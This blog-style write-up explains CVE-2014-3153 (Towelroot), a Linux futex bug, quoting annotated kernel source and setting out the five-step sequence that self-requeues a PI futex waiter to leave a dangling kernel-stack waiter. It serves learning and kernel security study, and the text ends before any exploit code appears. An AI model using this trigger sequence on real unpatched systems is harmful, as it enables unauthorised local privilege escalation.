I decided to take on a small kernel exploit <a href="https://github.com/elongl/pwnable.kr/tree/master/syscall">challenge</a>, and in parallel read <a href="https://books.google.co.il/books/about/Linux_Kernel_Development.html?id=3MWRMYRwulIC">Linux Kernel Development</a>.
Initially, the thought of reading the kernel’s code seemed a bit spooky, <em>“I wouldn’t understand a thing”</em>.
Little by little, it wasn’t as intimidating, and honestly, it turned out to be quite easier than I expected.</p>
<p>Now, I feel tenfolds more comfortable to simply look something up in the source in order to understand how it works,
rather than searching man pages endlessly or consulting other people.</p>
<p><img src="https://i.imgur.com/vJP3B8i.png" alt="Linux Kernel Image" /></p>
<h1 id="kernel-exploitation">Kernel Exploitation</h1>
<p>The book was really nice and all, but I wanted to get my hands dirty.<br />
I searched for a disclosed vulnerability within the Linux kernel,<br />
my plan being that I’d read its flat description and develop my own exploit to it.<br />
A friend recommended <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153">CVE-2014-3153</a>, also known as <em>Towelroot</em>, and I just went for it.<br />
Back in the days, it was very commonly used in order to root Android devices.</p>
<h1 id="fast-userspace-mutex">Fast Userspace Mutex</h1>
<p>The vulnerability is based around a mechanism called <em>Futex</em> within the kernel.<br />
Futex being a wordplay on <em>Fast userspace Mutex</em>.</p>
<p>The Linux kernel provides futexes as a building block for implementing userspace locking.<br />
A Futex is identified by a piece of memory which can be shared
between processes or threads. In its bare form, a
Futex is a counter that can be incremented and decremented atomically
and processes can wait for its value to become positive.</p>
<p>Futex operation occurs entirely in userspace for the noncontended case.<br />
The kernel is involved only to arbitrate the contended case.<br />
Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.</p>
<blockquote>
<p>The futex() system call provides a method for waiting until a
certain condition becomes true. It is typically used as a
blocking construct in the context of shared-memory
synchronization. When using futexes, the majority of the
synchronization operations are performed in user space. A user-
space program employs the futex() system call only when it is
likely that the program has to block for a longer time until the
condition becomes true. Other futex() operations can be used to
wake any processes or threads waiting for a particular condition.</p>
</blockquote>
<p>I will cover <strong>only</strong> the terms and concepts related to the exploitation.<br />
For a more profound insight about futexes, please reference <a href="https://man7.org/linux/man-pages/man2/futex.2.html">man futex(2)</a> and <a href="https://man7.org/linux/man-pages/man7/futex.7.html">man futex(7)</a>.<br />
I strongly suggest messing around with the examples in order to assess your understanding.</p>
<p>The <code class="language-plaintext highlighter-rouge">futex()</code> syscall isn’t typically used by “everyday” programs, but rather by system libraries such as <code class="language-plaintext highlighter-rouge">pthreads</code> that wrap its usage.
That’s why the syscall doesn’t have a glibc wrapper like most syscalls do.
In order to call it, one has to use <code class="language-plaintext highlighter-rouge">syscall(SYS_futex, ...)</code>.</p>
<p>Due to the blocking nature of <code class="language-plaintext highlighter-rouge">futex()</code> and it being a way to synchronize between different tasks,<br />
you’d notice how there’s a lot of dealing with threads within the exploit which can get slightly confusing unless approached slowly.</p>
<p>There are two core concepts to understand about futexes in general which we’d talk a lot about.</p>
<p>The first is something’s called a <em>waiters list</em>, also known as the <em>wait queue</em>.<br />
This term refers to the blocking threads that are currently waiting for a lock to be released.<br />
It is held in kernelspace and programs can issue syscalls to carry out operations on it.
For instance, attempting to lock a contended lock would result in an insertion of a waiter,
releasing a lock would pop a waiter from the list and reschedule its task.</p>
<p>The second is that there are two kinds of futexes: PI & non-PI.<br />
PI stands for <a href="https://en.wikipedia.org/wiki/Priority_inheritance">Priority Inheritance</a>.</p>
<blockquote>
<p>Priority inheritance is a mechanism for dealing with the
priority-inversion problem. With this mechanism, when a high-
priority task becomes blocked by a lock held by a low-priority
task, the priority of the low-priority task is temporarily raised
to that of the high-priority task, so that it is not preempted by
any intermediate level tasks, and can thus make progress toward
releasing the lock.</p>
</blockquote>
<p>This introduces the ability to prioritize waiters among the futex’s waiters list.<br />
A higher-priority task is guaranteed to get the lock faster than a lower-priority task.<br />
Unlike non-PI operations, for instance.</p>
<blockquote>
<p>FUTEX_WAKE<br />
This operation wakes at most val of the waiters that are
waiting (e.g., inside FUTEX_WAIT) on the futex word at the
address uaddr. Most commonly, val is specified as either
1 (wake up a single waiter) or INT_MAX (wake up all
waiters). No guarantee is provided about which waiters
are awoken (e.g., a waiter with a higher scheduling
priority is <strong>not guaranteed</strong> to be awoken in preference to a
waiter with a lower priority).</p>
</blockquote>
<p>Both non-PI and PI futex types are used within the exploit.<br />
The way PI futexes are implemented is using what’s called in the kernel a <em>plist</em>, a priority-sorted list.<br />
If you don’t know what it is, you could take a look <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/plist.h#L46">here</a>,
though this image sums it up perfectly.</p>
<p><img src="https://i.imgur.com/IBxItuz.png" alt="Priority List Image" /></p>
<p style="text-align: center; font-style: italic"><small>All images are copied from Appdome.</small></p>
<h1 id="bug--vulnerability">Bug & Vulnerability</h1>
<p>Here’s the CVE description.</p>
<blockquote>
<p>The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5
does not ensure that calls have two different futex addresses, which allows local users to gain privileges
via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.</p>
</blockquote>
<p>Let’s break it down.<br />
First, we need to understand what’s a requeue operation in the context of futexes.<br />
A waiter, blocking thread, that is contending on a lock,
can be “requeued” by a running thread to be told to wait on a different lock instead of the one that it currently waits on.</p>
<p>A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.<br />
A waiter on a PI-futex cannot be requeued.<br />
The bug itself is that there are <strong>no validations whatsoever on requeuing from a futex to itself</strong>.</p>
<p>This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.</p>
<blockquote>
<p>FUTEX_CMP_REQUEUE_PI<br />
Requeues waiters that are blocked via
FUTEX_WAIT_REQUEUE_PI on uaddr from a <strong>non-PI source</strong> futex
(uaddr) to a <strong>PI target</strong> futex (uaddr2).</p>
</blockquote>
<p>Take a look at the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e9c243a5a6de0be8e584c604d353412584b592f8">bug fix commit</a>, both the description and the code changes.</p>
<p>Though, what actually happens when you requeue a waiter to itself? Good question.</p>
<p>Before actually diving into the exploit, I decided to provide a rough overview of how it works for context further on.
Eventually, what this bug gives us is a <strong>dangling waiter</strong> within the futex’s waiters list.
The way the exploit does that is as follows:</p>
<table>
<tbody>
<tr>
<td><strong>Step</strong></td>
<td><strong>Operation</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>1.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_LOCK_PI</code></td>
<td>Lock a PI futex.</td>
</tr>
<tr>
<td>2.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_WAIT_REQUEUE_PI</code></td>
<td>Wait on a non-PI futex, with the intention of being requeued to the PI futex.</td>
</tr>
<tr>
<td>3.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code></td>
<td>Requeue the non-PI futex waiter onto the PI futex.</td>
</tr>
<tr>
<td>4.</td>
<td>Userspace Overwrite</td>
<td>Set the PI futex’s value to <code class="language-plaintext highlighter-rouge">0</code> so that the kernel treats it as if the lock is available.</td>
</tr>
<tr>
<td>5.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code></td>
<td>Requeue the PI futex waiter to <strong>itself</strong>.</td>
</tr>
</tbody>
</table>
<p>And now we’ll understand why this results in a dangling waiter.</p>
<p>There are a lot of different data types within the Futex’s implementation code,<br />
in order to cope with that I made somewhat of a <a href="https://github.com/elongl/CVE-2014-3153/blob/master/notes.md#data-structures">summary of them</a> to help me keep track of what’s going on.
Feel free to use it as needed.</p>
<p><strong>Step 1</strong></p>
<p>We start off by locking the PI-futex.
We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately.
That waiter is destined to be our dangling waiter later on in the exploit.</p>
<p><strong>Step 2</strong></p>
<p>In order to requeue a waiter from a non-PI –> PI futex, we first have to invoke <code class="language-plaintext highlighter-rouge">FUTEX_WAIT_REQUEUE_PI</code> on the non-PI futex,
which in turn translates to the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> function.<br />
What this function does is take a non-PI futex and wait (<code class="language-plaintext highlighter-rouge">FUTEX_WAIT</code>) on it,
and a PI-futex that it can <em>potentially</em> be requeued to with a <code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code> command later on.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_wait_requeue_pi</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
<span class="n">u32</span> <span class="n">val</span><span class="p">,</span> <span class="n">ktime_t</span> <span class="o">*</span><span class="n">abs_time</span><span class="p">,</span> <span class="n">u32</span> <span class="n">bitset</span><span class="p">,</span>
<span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr2</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">hrtimer_sleeper</span> <span class="n">timeout</span><span class="p">,</span> <span class="o">*</span><span class="n">to</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="n">rt_waiter</span><span class="p">;</span> <span class="c1">// <-- Important</span>
<span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">pi_mutex</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb</span><span class="p">;</span>
<span class="k">union</span> <span class="n">futex_key</span> <span class="n">key2</span> <span class="o">=</span> <span class="n">FUTEX_KEY_INIT</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">futex_q</span> <span class="n">q</span> <span class="o">=</span> <span class="n">futex_q_init</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">res</span><span class="p">,</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The function defines various local variables, the most important of which is the <code class="language-plaintext highlighter-rouge">rt_waiter</code> variable.<br />
Unsurprisingly, this variable is our waiter.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">plist_node</span> <span class="n">list_entry</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">plist_node</span> <span class="n">pi_list_entry</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It contains the <code class="language-plaintext highlighter-rouge">lock</code> that it waits on,
it holds references to other waiters in the waiters list through the <code class="language-plaintext highlighter-rouge">list_entry</code> plist node,
and on top of that it also has a pointer to the <code class="language-plaintext highlighter-rouge">task</code> that it currently blocks.</p>
<p>Needless to say that the locals are placed on the kernel stack,
but also worth mentioning that because it’ll be crucial to understand in the near future.</p>
<p>Later on, it initializes the futex queue entry and enqueues it.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">q</span><span class="p">.</span><span class="n">bitset</span> <span class="o">=</span> <span class="n">bitset</span><span class="p">;</span>
<span class="n">q</span><span class="p">.</span><span class="n">rt_waiter</span> <span class="o">=</span> <span class="o">&</span><span class="n">rt_waiter</span><span class="p">;</span>
<span class="n">q</span><span class="p">.</span><span class="n">requeue_pi_key</span> <span class="o">=</span> <span class="o">&</span><span class="n">key2</span><span class="p">;</span>
<span class="p">...</span>
<span class="cm">/* Queue the futex_q, drop the hb lock, wait for wakeup. */</span>
<span class="n">futex_wait_queue_me</span><span class="p">(</span><span class="n">hb</span><span class="p">,</span> <span class="o">&</span><span class="n">q</span><span class="p">,</span> <span class="n">to</span><span class="p">);</span>
</code></pre></div></div>
<p>Note how it sets the <code class="language-plaintext highlighter-rouge">requeue_pi_key</code> to the futex key of the target futex.<br />
This is part of what allows us to self-requeue. We’ll see this in the final step.</p>
<p>At this point in the code, the function simply blocks and does not continue unless:</p>
<ol>
<li>A wakeup occurs.</li>
<li>The process is killed.</li>
</ol>
<p><strong>Step 3</strong></p>
<p>Next up, <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1264"><code class="language-plaintext highlighter-rouge">futex_requeue()</code></a> is called by the <code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code> operation in another thread in order to do the heavy lifting of actually requeuing the waiter.
This is the <strong>vulnerable</strong> and most important function in the exploit.
The function is fairly long and therefore I’m not going to review all of its logic, and rather only address the relevant parts.<br />
I do encourage you to brief over it and try to get a hold of what it does.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_requeue</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr1</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
<span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr2</span><span class="p">,</span> <span class="kt">int</span> <span class="n">nr_wake</span><span class="p">,</span> <span class="kt">int</span> <span class="n">nr_requeue</span><span class="p">,</span>
<span class="n">u32</span> <span class="o">*</span><span class="n">cmpval</span><span class="p">,</span> <span class="kt">int</span> <span class="n">requeue_pi</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="n">requeue_pi</span> <span class="o">&&</span> <span class="p">(</span><span class="n">task_count</span> <span class="o">-</span> <span class="n">nr_wake</span> <span class="o"><</span> <span class="n">nr_requeue</span><span class="p">))</span> <span class="p">{</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">futex_proxy_trylock_atomic</span><span class="p">(</span><span class="n">uaddr2</span><span class="p">,</span> <span class="n">hb1</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="o">&</span><span class="n">key1</span><span class="p">,</span>
<span class="o">&</span><span class="n">key2</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_state</span><span class="p">,</span> <span class="n">nr_requeue</span><span class="p">);</span>
<span class="cm">/*
* Lock is already acquired due to our call to FUTEX_LOCK_PI in step 1.
* Therefore the acquisition fails and 0 is returned.
* We will revisit futex_proxy_trylock_atomic below.
*/</span>
<span class="p">...</span>
<span class="n">head1</span> <span class="o">=</span> <span class="o">&</span><span class="n">hb1</span><span class="o">-></span><span class="n">chain</span><span class="p">;</span>
<span class="n">plist_for_each_entry_safe</span><span class="p">(</span><span class="n">this</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span> <span class="n">head1</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
<span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="n">requeue_pi</span><span class="p">)</span> <span class="p">{</span>
<span class="n">atomic_inc</span><span class="p">(</span><span class="o">&</span><span class="n">pi_state</span><span class="o">-></span><span class="n">refcount</span><span class="p">);</span>
<span class="n">this</span><span class="o">-></span><span class="n">pi_state</span> <span class="o">=</span> <span class="n">pi_state</span><span class="p">;</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">rt_mutex_start_proxy_lock</span><span class="p">(</span><span class="o">&</span><span class="n">pi_state</span><span class="o">-></span><span class="n">pi_mutex</span><span class="p">,</span>
<span class="n">this</span><span class="o">-></span><span class="n">rt_waiter</span><span class="p">,</span>
<span class="n">this</span><span class="o">-></span><span class="n">task</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="cm">/*
* this->rt_waiter points to the local variable rt_waiter
* in the futex_wait_requeue_pi from step 2.
* It is now added as a waiter on the new lock.
*/</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Let’s quickly glance at the code that requeues the waiter at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/rtmutex.c#L962"><code class="language-plaintext highlighter-rouge">rt_mutex_start_proxy_lock()</code></a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">rt_mutex_start_proxy_lock</span><span class="p">(</span><span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">waiter</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span> <span class="kt">int</span> <span class="n">detect_deadlock</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
<span class="n">raw_spin_lock</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_lock</span><span class="p">);</span>
<span class="c1">// Attempt to take the lock. Fails because lock is taken.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">try_to_take_rt_mutex</span><span class="p">(</span><span class="n">lock</span><span class="p">,</span> <span class="n">task</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">))</span> <span class="p">{</span>
<span class="n">raw_spin_unlock</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_lock</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">task_blocks_on_rt_mutex</span><span class="p">(</span><span class="n">lock</span><span class="p">,</span> <span class="n">waiter</span><span class="p">,</span> <span class="n">task</span><span class="p">,</span> <span class="n">detect_deadlock</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>And inside <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/rtmutex.c#L405"><code class="language-plaintext highlighter-rouge">task_blocks_on_rt_mutex()</code></a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">task_blocks_on_rt_mutex</span><span class="p">(</span><span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">waiter</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">detect_deadlock</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">owner</span> <span class="o">=</span> <span class="n">rt_mutex_owner</span><span class="p">(</span><span class="n">lock</span><span class="p">);</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">top_waiter</span> <span class="o">=</span> <span class="n">waiter</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">chain_walk</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">res</span><span class="p">;</span>
<span class="p">...</span>
<span class="c1">// Set the waiter's task and rt_mutex members.</span>
<span class="n">waiter</span><span class="o">-></span><span class="n">task</span> <span class="o">=</span> <span class="n">task</span><span class="p">;</span>
<span class="n">waiter</span><span class="o">-></span><span class="n">lock</span> <span class="o">=</span> <span class="n">lock</span><span class="p">;</span>
<span class="c1">// Initialize the waiter's list entries.</span>
<span class="n">plist_node_init</span><span class="p">(</span><span class="o">&</span><span class="n">waiter</span><span class="o">-></span><span class="n">list_entry</span><span class="p">,</span> <span class="n">task</span><span class="o">-></span><span class="n">prio</span><span class="p">);</span>
<span class="n">plist_node_init</span><span class="p">(</span><span class="o">&</span><span class="n">waiter</span><span class="o">-></span><span class="n">pi_list_entry</span><span class="p">,</span> <span class="n">task</span><span class="o">-></span><span class="n">prio</span><span class="p">);</span>
<span class="cm">/* Get the top priority waiter on the lock */</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rt_mutex_has_waiters</span><span class="p">(</span><span class="n">lock</span><span class="p">))</span>
<span class="n">top_waiter</span> <span class="o">=</span> <span class="n">rt_mutex_top_waiter</span><span class="p">(</span><span class="n">lock</span><span class="p">);</span>
<span class="c1">// Add the waiter to the waiters list.</span>
<span class="n">plist_add</span><span class="p">(</span><span class="o">&</span><span class="n">waiter</span><span class="o">-></span><span class="n">list_entry</span><span class="p">,</span> <span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_list</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Now, <code class="language-plaintext highlighter-rouge">rt_waiter</code> of <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> is a node in the waiters list of our PI futex.</p>
<p><strong>Step 4</strong></p>
<p>Here we’ll set the userspace value of the futex, also known as the futex-word, to <code class="language-plaintext highlighter-rouge">0</code>.<br />
This is vital so that when the self-requeuing occurs,
the call to <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1202"><code class="language-plaintext highlighter-rouge">futex_proxy_trylock_atomic()</code></a> will succeed and wake the top waiter of the source futex,
which is in fact the same as the destination futex.
The problem arises when we have a waiter in the waiters list whose thread we can wake up without forcing its deletion from the waiters list.</p>
<p>It might seem confusing at first but it’ll clear up in the next step.</p>
<p><strong>Step 5</strong></p>
<p>On this step, we’ll requeue the PI futex waiter to itself and invoke <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1264"><code class="language-plaintext highlighter-rouge">futex_requeue()</code></a> once again.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">requeue_pi</span> <span class="o">&&</span> <span class="p">(</span><span class="n">task_count</span> <span class="o">-</span> <span class="n">nr_wake</span> <span class="o"><</span> <span class="n">nr_requeue</span><span class="p">))</span> <span class="p">{</span>
<span class="cm">/*
* Attempt to acquire uaddr2 and wake the top waiter. If we
* intend to requeue waiters, force setting the FUTEX_WAITERS
* bit. We force this here where we are able to easily handle
* faults rather in the requeue loop below.
*/</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">futex_proxy_trylock_atomic</span><span class="p">(</span><span class="n">uaddr2</span><span class="p">,</span> <span class="n">hb1</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="o">&</span><span class="n">key1</span><span class="p">,</span>
<span class="o">&</span><span class="n">key2</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_state</span><span class="p">,</span> <span class="n">nr_requeue</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Let’s take a look at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1202"><code class="language-plaintext highlighter-rouge">futex_proxy_trylock_atomic()</code></a> this time.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
* Return:
* 0 - failed to acquire the lock atomically;
* 1 - acquired the lock;
* <0 - error
*/</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_proxy_trylock_atomic</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">pifutex</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb1</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb2</span><span class="p">,</span>
<span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key1</span><span class="p">,</span> <span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key2</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_pi_state</span> <span class="o">**</span><span class="n">ps</span><span class="p">,</span> <span class="kt">int</span> <span class="n">set_waiters</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">futex_q</span> <span class="o">*</span><span class="n">top_waiter</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">curval</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">top_waiter</span> <span class="o">=</span> <span class="n">futex_top_waiter</span><span class="p">(</span><span class="n">hb1</span><span class="p">,</span> <span class="n">key1</span><span class="p">);</span>
<span class="cm">/* There are no waiters, nothing for us to do. */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">top_waiter</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="cm">/* Ensure we requeue to the expected futex. */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">match_futex</span><span class="p">(</span><span class="n">top_waiter</span><span class="o">-></span><span class="n">requeue_pi_key</span><span class="p">,</span> <span class="n">key2</span><span class="p">))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
<span class="cm">/*
* Try to take the lock for top_waiter. Set the FUTEX_WAITERS bit in
* the contended case or if set_waiters is 1. The pi_state is returned
* in ps in contended cases.
*/</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">futex_lock_pi_atomic</span><span class="p">(</span><span class="n">pifutex</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">ps</span><span class="p">,</span> <span class="n">top_waiter</span><span class="o">-></span><span class="n">task</span><span class="p">,</span>
<span class="n">set_waiters</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">requeue_pi_wake_futex</span><span class="p">(</span><span class="n">top_waiter</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">hb2</span><span class="p">);</span>
<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Pay attention to how it ensures that the <code class="language-plaintext highlighter-rouge">requeue_pi_key</code> of the <code class="language-plaintext highlighter-rouge">top_waiter</code> is equal to the requeue’s target futex’s key.
This is why we need to <strong>self-requeue</strong>, and why it <em>wouldn’t</em> be sufficient to just set the value of a different futex in userspace to <code class="language-plaintext highlighter-rouge">0</code> and requeue to it.</p>
<p>So the requirements for triggering the bug are:</p>
<ol>
<li>The target futex from the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> remains.</li>
<li>There’s a waiter that is actively contending on the source futex.</li>
</ol>
<p>The only scenario that meets both these terms is a self-requeue.</p>
<p>Other than that, basically all it does is call <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L718"><code class="language-plaintext highlighter-rouge">futex_lock_pi_atomic()</code></a> and if the lock was acquired,<br />
wake up the top waiter of the source futex.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_lock_pi_atomic</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr</span><span class="p">,</span> <span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb</span><span class="p">,</span>
<span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_pi_state</span> <span class="o">**</span><span class="n">ps</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span> <span class="kt">int</span> <span class="n">set_waiters</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">lock_taken</span><span class="p">,</span> <span class="n">ret</span><span class="p">,</span> <span class="n">force_take</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">uval</span><span class="p">,</span> <span class="n">newval</span><span class="p">,</span> <span class="n">curval</span><span class="p">,</span> <span class="n">vpid</span> <span class="o">=</span> <span class="n">task_pid_vnr</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>
<span class="nl">retry:</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">lock_taken</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="cm">/*
* To avoid races, we attempt to take the lock here again
* (by doing a 0 -> TID atomic cmpxchg), while holding all
* the locks. It will most likely not succeed.
*/</span>
<span class="n">newval</span> <span class="o">=</span> <span class="n">vpid</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">set_waiters</span><span class="p">)</span>
<span class="n">newval</span> <span class="o">|=</span> <span class="n">FUTEX_WAITERS</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">cmpxchg_futex_value_locked</span><span class="p">(</span><span class="o">&</span><span class="n">curval</span><span class="p">,</span> <span class="n">uaddr</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">newval</span><span class="p">)))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="p">...</span>
<span class="cm">/*
* Surprise - we got the lock. Just return to userspace:
*/</span>
